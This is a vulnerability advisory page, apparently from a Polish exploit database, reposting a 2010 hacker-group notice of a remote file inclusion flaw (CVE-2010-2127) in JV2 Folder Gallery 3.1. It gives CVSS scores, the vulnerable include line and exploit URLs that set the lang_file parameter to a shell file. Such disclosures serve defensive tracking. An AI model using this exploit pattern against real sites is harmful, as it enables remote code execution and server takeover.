JV2 Folder Gallery <==3.1 (gallery.php )

2010-06-02 / 2010-06-03

Credit: Sn!pEr.S!Te Hacker #

Risk: High

Local: No

Remote: Yes

CVE: CVE-2010-2127

CWE: CWE-94

Ogólna skala CVSS: 7.5/10

Znaczenie: 6.4/10

Łatwość wykorzystania: 10/10

Wymagany dostęp: Zdalny

Złożoność ataku: Niska

Autoryzacja: Nie wymagana

Wpływ na poufność: Częściowy

Wpływ na integralność: Częściowy

Wpływ na dostępność: Częściowy

   __           __      ___ 
 __            __  /'__`\        /\ \__  /'__`\                  
/\_\    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __       ___    ___     ___ ___           
\/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\    /'___\ / __`\ /' __` __`\    
 \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/  __/\ \__//\ \L\ \/\ \/\ \/\ \   
  \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ /\_\ \____\ \____/\ \_\ \_\ \_\   
   \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/ \/_/\/____/\/___/  \/_/\/_/\/_/ 
              \ \____/                                            
               \/___/ 
  
# ----------------------oOO---(_)---OOo----------------------- 
# | __ __ |   
# | _____/ /_____ ______/ /_ __ ______ ______ |   
# | / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/ |   
# | (__ ) /_/ /_/ / / / /_/ / /_/ / /_/ (__ ) |   
# | /____/\__/\__,_/_/ /_.___/\__,_/\__, /____/ |   
# | Security Sn!pEr.S!Te /____/ 2o1o |   
# ------------------------------------------------------------ 
     Remote File Inclusion Vulnerability
# ----------------------------------------------------------- 
---------------------------------------------------------------- 
JV2 Folder Gallery <==3.1  (gallery.php ) 
  
----------------------------------------------------------------
#[+] Author : Sn!pEr.S!Te Hacker #  
# [+] Email : sniper-site@HoTMaiL.coM #  
# [+] T34M Sn!pEr.S!Te Hacker #  
# [+] 21-5-2010 # 
# [+] Script : Image Galleries ? JV2 Folder Gallery#
# [+] Download:http://foldergallery.jv2.net/download.php?file=foldergallery_3.1#
# Version: [3.1] #

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=
Exploit : gallery/gallery.php

http://localhost/gallery/gallery.php?lang_file=[shell.txt ]

htpp://127.0.0.1/gallery/gallery.php?lang_file=[shell.txt ]

iinclude ($lang_file);

line : 113 

web site Favorites my : http://inj3ct0r.com/  & http://www.hack0wn.com/ & http://www.exploit-db.com

==================   Greetz : all my friend   ===================
 * liar * sm Hacker * baby hacker * mAsH3L ALLiL * saleh Hacker * ALhal alsab |
 * ThE DarK * abo badr * aStoorh alqssim * Ramad Hacker * h-ex |
 * yousfe * HitLer.3rb * QAHER ALRAFDE * DjHacker * My Heart * Mr.koka |
 		 	   		  
_________________________________________________________________
????? ?????????? ??????? ????? ?????. ???? ??? Windows Live Hotmail ??????.
https://signup.live.com/signup.aspx?id=60969

Referencje:

http://xforce.iss.net/xforce/xfdb/58807

http://www.securityfocus.com/bid/40339

http://www.exploit-db.com/exploits/12688

http://packetstormsecurity.org/1005-exploits/jv2foldergallery-rfi.txt

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

JV2 Folder Gallery <==3.1 (gallery.php )

Referencje:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.